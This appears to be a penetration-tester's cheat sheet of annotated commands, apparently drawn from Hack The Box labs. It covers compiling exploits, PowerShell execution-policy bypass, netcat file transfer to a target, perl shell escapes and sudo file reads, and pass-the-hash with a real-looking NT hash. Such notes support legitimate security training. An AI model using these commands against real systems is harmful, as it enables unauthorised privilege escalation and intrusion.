# MISC

Compiling Exploits

```
# Compile C code; add -m32 after 'gcc' to build 32-bit code on 64-bit Linux (needs gcc-multilib)
gcc -o exploit exploit.c

# Cross compiling: build a Windows exploit on Linux (Winsock is linked with -lws2_32)
# i686-w64-mingw32-gcc produces 32-bit binaries, x86_64-w64-mingw32-gcc 64-bit ones
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe

# Compile a Python script to a Windows executable (PyInstaller running under Wine)
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
```

Packet Inspection

```
# Capture TCP port 80 traffic on eth0 to a pcap file; options go before the filter expression
tcpdump -i eth0 -w output.pcap tcp port 80
```

Powershell bypass

```
# Run a script regardless of the execution policy (the policy is a safety setting, not a security boundary)
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
```

Windows Exploit Suggester

```
# -d: the MS bulletin database (download it first with --update); -i: output of `systeminfo` from the target
./windows-exploit-suggester.py -d 2019-07-20-mssb.xls -i system.txt
```

Finding Auxiliary Scripts (Nmap NSE)

```
# List Nmap scripts for SMB vulnerability checks; run one with nmap --script <name> <target>
ls /usr/share/nmap/scripts/ | grep smb | grep vuln
```

Netcat

```
# File transfer from attacker to target
# At target: the listener writes whatever arrives to blah.txt
nc -lvp 6969 > blah.txt
# At attacker (method 1)
nc x.x.x.x 6969 < blah.txt
# At attacker (method 2)
cat blah.txt | nc x.x.x.x 6969
# If the sender does not exit after EOF, add -q 1 (traditional netcat) or -N (OpenBSD netcat) so it closes the connection
```

Perl Exploit

```
# Spawn a shell from Perl (e.g. when perl can be run via sudo)
perl -e 'exec "/bin/sh";'
# Read a root-only file when sudo permits perl: -F: splits each line on ':', -lane prints the first field
# (a line without a colon is printed whole)
sudo perl -F: -lane 'print $F[0]' /root/root.txt
```

Awk

```
# Remove duplicate lines, keeping the first occurrence and the original order (unlike sort -u, input need not be sorted)
awk '!seen[$0]++' file
```

Searchsploit

```
# --exact: match the title exactly; --overflow: do not truncate long titles; --mirror: copy the exploit with this EDB-ID into the current directory
searchsploit --overflow --exact --mirror 21234
searchsploit --overflow --exact Gwolle
```

Firewall Rule Enable

```
# Allow the target to reach ports 80 and 443 on the attacking host (e.g. for a reverse shell or a file download)
ufw allow from victimip to any port 80,443 proto tcp
```

Wordlist Creation

```
# Spider the site and build a wordlist; -e also collects email addresses, -a includes words from file metadata
cewl -w cewl-forum.txt -e -a http://forum.bart.htb
```

PASS the HASH

```
# pth-winexe takes DOMAIN/user%LMHASH:NTHASH (or a plaintext password after the %)
pth-winexe -U jenkins/administrator //ip cmd.exe
pth-winexe -U jenkins/administrator%password //ip cmd.exe
# The LM half is usually the "empty" LM hash aad3b435b51404eeaad3b435b51404ee (LM hashing disabled); --system runs cmd.exe as SYSTEM
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
# crackmapexec takes the NT hash directly with -H
crackmapexec smb 10.10.10.63 -u administrator -H e0fb1fb85756c24235ff238cbe81fe00
```

Share folder Windows to Linux (VMware shared folders)

```
# Mount the VMware host's shared folders in a Linux guest (open-vm-tools); the mount point must already exist
# allow_other lets users other than the one running the mount access it
mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other
```